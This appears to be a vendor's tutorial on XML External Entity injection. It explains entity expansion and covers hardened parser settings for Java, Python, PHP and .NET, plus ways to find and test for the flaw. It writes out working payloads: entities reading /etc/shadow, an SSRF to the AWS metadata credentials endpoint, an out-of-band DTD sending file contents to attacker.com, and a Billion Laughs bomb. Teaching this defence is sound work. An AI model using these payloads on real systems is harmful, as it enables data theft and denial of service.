XXE Injection: XML External Entity Attacks Explained
XXE injection (XML External Entity injection) is a class of attacks targeting applications that parse XML input. When an XML parser is configured to process external entity declarations, an attacker can use them to read arbitrary files from the server, perform server-side request forgery, cause denial of service, or in some cases achieve remote code execution. XXE had its own entry in the OWASP Top 10 (A4 in the 2017 edition, folded into Security Misconfiguration in 2021), and it persists because the secure configuration requires explicitly disabling features that are enabled by default in many XML libraries.
[Scan your web application for security misconfigurations with ZeriFlow](https://zeriflow.com) — 80+ checks, completely free.
Understanding XML External Entities
XML supports a feature called "entities": named shortcuts for content. A simple internal entity is harmless:
<!DOCTYPE note [
<!ENTITY company 'Acme Corporation'>
]>
<note>From: &company;</note>
External entities fetch content from a URI:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM 'file:///etc/passwd'>
]>
<foo>&xxe;</foo>
When the XML parser processes &xxe;, it opens /etc/passwd and inserts its contents into the XML document. If the application returns the parsed XML (or part of it) in the response, the attacker receives the file contents.
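To make the difference concrete, here is a minimal Python sketch using only the standard library's xml.etree.ElementTree. It assumes a current CPython, where the internal entity is expanded while the external reference is refused with a ParseError. A parser configured to resolve external entities would fetch the file instead. The constant and function names are illustrative.

```python
import xml.etree.ElementTree as ET

INTERNAL_DOC = """<!DOCTYPE note [
  <!ENTITY company 'Acme Corporation'>
]>
<note>From: &company;</note>"""

EXTERNAL_DOC = """<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM 'file:///etc/passwd'>
]>
<foo>&xxe;</foo>"""


def parse_text(document: str) -> str:
    """Parse a document and return the root element's text."""
    return ET.fromstring(document).text or ""


# Internal entity: the parser substitutes the declared text inline.
internal_text = parse_text(INTERNAL_DOC)

# External entity: ElementTree does not fetch the URI and raises instead.
try:
    parse_text(EXTERNAL_DOC)
    external_refused = False
except ET.ParseError:
    external_refused = True

print(internal_text)
print("external entity refused:", external_refused)
```

The same two documents fed to a parser with external entity resolution enabled would return the file contents in place of &xxe;, which is the behavior the attacks below rely on.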
XXE Attack Types
File Disclosure (Classic XXE)
<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM 'file:///etc/shadow'>
]>
<order>
<item>&xxe;</item>
</order>
Target files on Linux:
- /etc/passwd — user accounts
- /etc/shadow — password hashes (requires root)
- /proc/self/environ — environment variables (may contain secrets)
- /proc/self/cmdline — running command
- ~/.ssh/id_rsa — SSH private key
- Application config files with database credentials
On Windows:
- C:\Windows\System32\drivers\etc\hosts
- C:\inetpub\wwwroot\web.config (IIS configuration, may contain credentials)
SSRF via XXE
External entities can use HTTP/HTTPS instead of file://:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM 'http://169.254.169.254/latest/meta-data/iam/security-credentials/'>
]>
<foo>&xxe;</foo>
This turns the XXE into an SSRF attack against the AWS metadata service: the same devastating capability described in our SSRF guide, but triggered through XML parsing.
Blind XXE (Out-of-Band)
When the application doesn't reflect the entity value in the response, attackers use out-of-band channels:
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM 'http://attacker.com/malicious.dtd'>
%xxe;
]>
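<foo/>
malicious.dtd on the attacker's server:
<!ENTITY % file SYSTEM 'file:///etc/passwd'>
<!ENTITY % ooband "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%ooband;
%exfil;
The inner percent sign is written as &#x25; so that it is not interpreted as a parameter-entity reference while %ooband; itself is being declared. When the parser expands %exfil;, it requests the attacker's URL with the file contents embedded in it, so the data leaks through the HTTP request (and its DNS lookup) even though the application's response reveals nothing.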
Billion Laughs (XML Bomb / DoS)
<?xml version='1.0'?>
<!DOCTYPE lolz [
<!ENTITY lol 'lol'>
<!ENTITY lol1 '&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;'>
<!ENTITY lol2 '&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;'>
<!ENTITY lol3 '&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;'>
<!-- ... lol4 through lol8 follow the same pattern ... -->
<!ENTITY lol9 '&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;'>
]>
<lolz>&lol9;</lolz>
This tiny document (under 1 KB) expands to 10^9 (a billion) copies of "lol", roughly 3 GB of text, which is enough to exhaust memory and crash an unprotected parser.
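The growth is plain exponentiation. Here is a minimal sketch of the arithmetic, assuming nine nesting levels above the base entity with ten references each (the classic shape of this attack). The function names are illustrative.

```python
def expanded_copies(levels: int, fanout: int = 10) -> int:
    """Number of base strings produced after `levels` rounds of nesting."""
    return fanout ** levels


def expanded_bytes(levels: int, fanout: int = 10, base: str = "lol") -> int:
    """Size in bytes of the fully expanded text."""
    return expanded_copies(levels, fanout) * len(base.encode("utf-8"))


copies = expanded_copies(9)
size_gb = expanded_bytes(9) / 1e9
print(f"{copies:,} copies, about {size_gb:.0f} GB of text")
```

Each additional level multiplies the output by ten while adding only one short line to the payload, which is why limits on entity expansion depth or total expansion size are an effective countermeasure.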
Affected Applications and Formats
XXE affects more than obvious XML parsers. Any format built on XML is potentially vulnerable:
- SOAP web services: Request bodies are XML
- SVG file upload processing
- DOCX, XLSX, PPTX uploads: Microsoft Office formats are ZIP archives containing XML
- RSS/Atom feed parsers
- SAML authentication: Assertions are signed XML documents
- GPX, KML files: Geospatial formats
- Android APK manifest processing
SAML XXE is particularly dangerous: if an attacker can forge a SAML response (or if the IdP is compromised), they can embed XXE in the SAML assertion and attack the service provider's XML parser during authentication.
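For ZIP-based formats such as DOCX, one coarse pre-filter is to look for a DOCTYPE declaration in each XML member before handing the file to any parser. The sketch below assumes the upload is already in memory as bytes. The function name, the scanned suffixes, and the 4096-byte scan window are illustrative choices, not part of any library. A byte-level scan like this would miss members encoded in UTF-16, so it complements a hardened parser and does not replace it.

```python
import io
import zipfile
from typing import List


def members_with_doctype(archive_bytes: bytes, scan_limit: int = 4096) -> List[str]:
    """Return names of XML members whose leading bytes contain a DOCTYPE."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        for info in archive.infolist():
            # Only XML parts are of interest; skip images and other binaries.
            if not info.filename.lower().endswith((".xml", ".rels")):
                continue
            with archive.open(info) as member:
                head = member.read(scan_limit)
            # DOCTYPE is case-sensitive in XML, so an exact match is enough.
            if b"<!DOCTYPE" in head:
                flagged.append(info.filename)
    return flagged
```

A caller could reject the upload whenever the returned list is non-empty, since Office documents do not normally need a DOCTYPE in their parts.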
Secure Parser Configuration
Java (Most Vulnerable By Default)
Java's built-in XML parsers (DocumentBuilder, SAXParser, XMLStreamReader) enable external entities by default. Disable them explicitly:
// Secure DocumentBuilderFactory configuration
// Needs: javax.xml.parsers.DocumentBuilder, javax.xml.parsers.DocumentBuilderFactory, org.w3c.dom.Document
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// Disable DOCTYPE declarations entirely (safest)
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// Or, if DOCTYPE must be allowed, disable external entities specifically:
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(inputStream);
Python
Python's xml.etree.ElementTree does not expand external entities (it raises a ParseError on the reference instead), but lxml requires configuration:
from lxml import etree
# VULNERABLE (default lxml)
tree = etree.parse(xml_input)
# SECURE lxml
parser = etree.XMLParser(
    no_network=True,         # no external network fetching
    load_dtd=False,          # don't load external DTDs
    resolve_entities=False,  # don't resolve entities
)
tree = etree.parse(xml_input, parser)
Alternatively, use the defusedxml library, which is designed specifically to prevent XXE and related attacks:
import defusedxml.ElementTree as ET
# defusedxml raises on entity declarations and external references;
# pass forbid_dtd=True to reject any DOCTYPE as well
tree = ET.parse(xml_input)  # safe by default
PHP
// PHP < 8.0: disable external entity loading globally.
// The function is deprecated in PHP 8.0, so guard the call.
if (PHP_VERSION_ID < 80000) {
    libxml_disable_entity_loader(true);
}
// Never pass LIBXML_NOENT (substitutes entities) or LIBXML_DTDLOAD (loads external DTDs) for untrusted input
$doc = new DOMDocument();
$doc->loadXML($xml, LIBXML_NONET);
// SimpleXML: same rule, LIBXML_NONET only
$element = simplexml_load_string($input, 'SimpleXMLElement', LIBXML_NONET);
Note: In PHP 8.0+, libxml_disable_entity_loader() was deprecated because PHP 8.0 requires libxml 2.9.0 or later, where external entity loading is disabled by default. Verify this for your specific version, and remember that passing LIBXML_NOENT re-enables entity substitution.
.NET (C#)
// .NET 4.5.2+ has safe defaults, but be explicit:
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit; // block DOCTYPE
settings.XmlResolver = null; // no external resolution
using (XmlReader reader = XmlReader.Create(stream, settings))
{
    // parse safely
}
Testing for XXE
Basic test payload to confirm XXE:
<?xml version='1.0'?>
<!DOCTYPE test [
<!ENTITY xxe SYSTEM 'http://your-burp-collaborator.com/xxe-test'>
]>
<test>&xxe;</test>
If you see a DNS lookup or HTTP request to your collaborator server, the parser is processing external entities. Use Burp Suite's Collaborator or similar OOB infrastructure.
FAQ
Q: Which languages/parsers are safe from XXE by default?
A: Python's xml.etree.ElementTree, Go's encoding/xml, and Ruby's REXML are generally considered safe from external entity expansion by default. Java's built-in parsers, PHP's libxml-based extensions before PHP 8.0, and many C/C++ libxml2 bindings are not safe by default and require explicit hardening. Always check the specific version and configuration of your parser.
Q: Can JSON APIs be vulnerable to XXE?
A: Pure JSON parsers are not vulnerable to XXE. However, some applications accept both JSON and XML based on Content-Type. Submitting an XML body to a JSON endpoint that falls back to an XML parser can trigger XXE. Ensure all content-type handling is strict — reject XML where only JSON is expected.
Q: Is XXE the same as SSRF?
A: XXE can be used to achieve SSRF (by having external entities fetch HTTP URLs), but they're distinct vulnerability classes. XXE specifically exploits XML parser features; SSRF is a broader class of server-side URL fetching vulnerabilities. XXE is one of several ways to trigger SSRF.
Q: Does a WAF protect against XXE?
A: WAFs can detect common XXE patterns (DOCTYPE declarations, SYSTEM keyword in specific positions), but advanced blind XXE using parameter entities and out-of-band channels can bypass many WAF rules. Fix the parser configuration directly rather than relying on WAF rules as the primary defense.
Q: How do I find XXE vulnerabilities in my codebase?
A: Search for XML parsing calls in your codebase: DocumentBuilder, SAXParser, lxml.etree.parse, DOMDocument::loadXML, simplexml_load_string. Audit each one for the security features described above. Then test with the payloads in this guide against all endpoints that accept XML, DOCX, SVG, or other XML-based formats. ZeriFlow scans for server-level misconfigurations that may increase XXE exposure.
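The search step in the last answer can be sketched as a small script. The pattern list mirrors the calls named in that answer. The function names, the file suffixes, and the decision to match on plain substrings are assumptions for illustration, so expect false positives that need manual review.

```python
import re
from pathlib import Path
from typing import Iterator, List, Tuple

# Parser entry points named in the answer above; extend for your own stack.
PARSER_CALL = re.compile(
    r"DocumentBuilder|SAXParser|etree\.parse|DOMDocument|loadXML|simplexml_load_string"
)


def find_parser_calls(source: str) -> List[Tuple[int, str]]:
    """Return (line_number, stripped_line) for lines mentioning an XML parser call."""
    hits = []
    for number, line in enumerate(source.splitlines(), start=1):
        if PARSER_CALL.search(line):
            hits.append((number, line.strip()))
    return hits


def scan_tree(root: str, suffixes=(".java", ".py", ".php")) -> Iterator[Tuple[Path, int, str]]:
    """Walk a source tree and yield (path, line_number, line) for each hit."""
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix in suffixes:
            text = path.read_text(encoding="utf-8", errors="replace")
            for number, line in find_parser_calls(text):
                yield path, number, line
```

Calling scan_tree on a repository root produces a checklist of call sites to audit against the hardening settings described earlier.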
Conclusion
XXE injection persists because the secure configuration requires disabling features that are enabled by default in most XML libraries — and many developers don't know the feature exists until they read about an attack. The fix is straightforward: configure your parser to prohibit DOCTYPE declarations and external entity resolution.
Audit every XML parser in your codebase this week. Check Java DocumentBuilders, PHP DOMDocument instances, Python lxml parsers. Consider switching to defusedxml in Python projects for a hardened-by-default experience.
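Where a Python project cannot add a dependency, the "prohibit DOCTYPE" rule can be approximated with the standard library's expat bindings. This is a minimal sketch, not a drop-in replacement for a hardened library. DoctypeForbidden and ensure_no_doctype are hypothetical names, and the check is meant to run on the raw bytes before the real parser sees them.

```python
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def ensure_no_doctype(data: bytes) -> None:
    """Stream data through expat and raise as soon as a DOCTYPE appears."""

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeForbidden(f"DOCTYPE declaration not allowed (root name {name!r})")

    parser = expat.ParserCreate()
    # Called at the start of the declaration, before any entity in it is processed.
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)
```

Malformed input still raises expat.ExpatError, so callers should treat both exceptions as a rejected document.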
[Scan your application with ZeriFlow](https://zeriflow.com) for security misconfigurations that could amplify XXE impact — free, 80+ checks, no account required. Then fix your parsers. In that order.